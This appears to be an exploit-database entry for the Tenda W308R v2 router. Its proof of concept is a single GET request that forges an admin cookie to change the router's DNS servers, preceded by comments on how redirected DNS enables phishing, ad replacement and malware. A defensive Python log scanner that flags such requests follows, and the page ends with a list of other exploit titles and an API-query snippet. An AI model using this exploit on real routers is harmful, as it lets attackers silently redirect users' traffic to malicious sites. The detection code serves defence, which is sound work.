Author: "Todor Donev"
Platform: asp
Release date: 2018-03-30
```
#
#
#  Tenda W308R v2 Wireless Router V5.07.48
#  Cookie Session Weakness Remote DNS Change PoC
#
#
#  Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
#  https://ethical-hacker.org/
#  https://facebook.com/ethicalhackerorg
#
#
#  Once modified, systems use foreign DNS servers, which are
#  usually set up by cybercriminals. Users with vulnerable
#  systems or devices who try to access certain sites are
#  instead redirected to possibly malicious sites.
#
#  Modifying systems' DNS settings allows cybercriminals to
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites:
#       These sites can be phishing pages that
#       spoof well-known sites in order to
#       trick users into handing out sensitive
#       information.
#
#    o  Replacing ads on legitimate sites:
#       Visiting certain sites can serve users
#       with infected systems a different set
#       of ads from those whose systems are
#       not infected.
#
#    o  Controlling and redirecting network traffic:
#       Users of infected systems may not be granted
#       access to download important OS and software
#       updates from vendors like Microsoft and from
#       their respective security vendors.
#
#    o  Pushing additional malware:
#       Infected systems are more prone to other
#       malware infections (e.g., FAKEAV infection).
#
#  Disclaimer:
#  This or previous programs is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#
#  Use them at your own risk!
#
#

GET -H "Cookie: admin:language=en; path=/" "http://<TARGET>/goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=<DNS1>&DS2=<DNS2>" 2>/dev/null
```
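A defender's view of the request above, as an added example that is not part of the original advisory: it scans HTTP access-log lines for requests to `/goform/AdvSetDns` and flags any that set a DNS server outside an allowlist. The log lines are constructed samples in common log format, and the function name, the allowlist and the case-insensitive path match are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the resolvers this network is supposed to use (documentation-range IPs).
ALLOWED_DNS = {"192.0.2.53", "192.0.2.54"}

# Constructed sample lines in common log format, e.g. from a proxy or IDS HTTP log.
SAMPLE_LOG = [
    '10.0.0.23 - - [30/Mar/2018:10:01:02 +0000] "GET /index.asp HTTP/1.1" 200 512',
    '10.0.0.23 - - [30/Mar/2018:10:01:09 +0000] "GET /goform/AdvSetDns?GO=wan_dns.asp'
    '&rebootTag=&DSEN=1&DNSEN=on&DS1=198.51.100.7&DS2=198.51.100.8 HTTP/1.1" 302 0',
    '10.0.0.5 - - [30/Mar/2018:11:15:40 +0000] "GET /goform/AdvSetDns?GO=wan_dns.asp'
    '&rebootTag=&DSEN=1&DNSEN=on&DS1=192.0.2.53&DS2=192.0.2.54 HTTP/1.1" 302 0',
    '10.0.0.9 - - [30/Mar/2018:11:20:00 +0000] "GET /GoForm/advsetdns?DS1=203.0.113.9 HTTP/1.1" 302 0',
    'garbage line that does not parse',
]

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)


def find_dns_changes(lines, allowed=ALLOWED_DNS):
    """Return one finding per request that sets router DNS through AdvSetDns."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than crash the scan
        url = urlsplit(m["target"])
        # Compared case-insensitively as a conservative choice (assumption).
        if url.path.lower() != "/goform/advsetdns":
            continue
        qs = parse_qs(url.query, keep_blank_values=True)
        servers = [v for key in ("DS1", "DS2") for v in qs.get(key, []) if v]
        unexpected = [s for s in servers if s not in allowed]
        findings.append({
            "src": m["src"],
            "time": m["ts"],
            "servers": servers,
            "unexpected": unexpected,
            "alert": bool(unexpected),
        })
    return findings


if __name__ == "__main__":
    for f in find_dns_changes(SAMPLE_LOG):
        print("ALERT" if f["alert"] else "ok   ", f["src"], f["time"], f["servers"])
```

Access logs rarely record the `Cookie` header, so the path and the `DS1`/`DS2` parameters are the signal this check relies on.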
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-07-10 | "HelloWeb 2.0 - Arbitrary File Download" | webapps | asp | bRpsd |
2020-03-16 | "Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)" | webapps | asp | "Miguel Mendez Z" |
2020-01-24 | "OLK Web Store 2020 - Cross-Site Request Forgery" | webapps | asp | "Joel Aviad Ossi" |
2019-12-18 | "Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting" | webapps | asp | "Harshit Shukla" |
2019-11-18 | "Crystal Live HTTP Server 6.01 - Directory Traversal" | webapps | asp | "numan türle" |
2019-08-16 | "Web Wiz Forums 12.01 - 'PF' SQL Injection" | webapps | asp | n1x_ |
2019-05-06 | "microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection" | webapps | asp | "felipe andrian" |
2019-02-12 | "Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow" | dos | asp | "Kaustubh G. Padwad" |
2018-11-05 | "Advantech WebAccess SCADA 8.3.2 - Remote Code Execution" | webapps | asp | "Chris Lyne" |
2018-05-29 | "IssueTrak 7.0 - SQL Injection" | webapps | asp | "Chris Anastasio" |
```python
import requests

response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/44373/?format=json')
```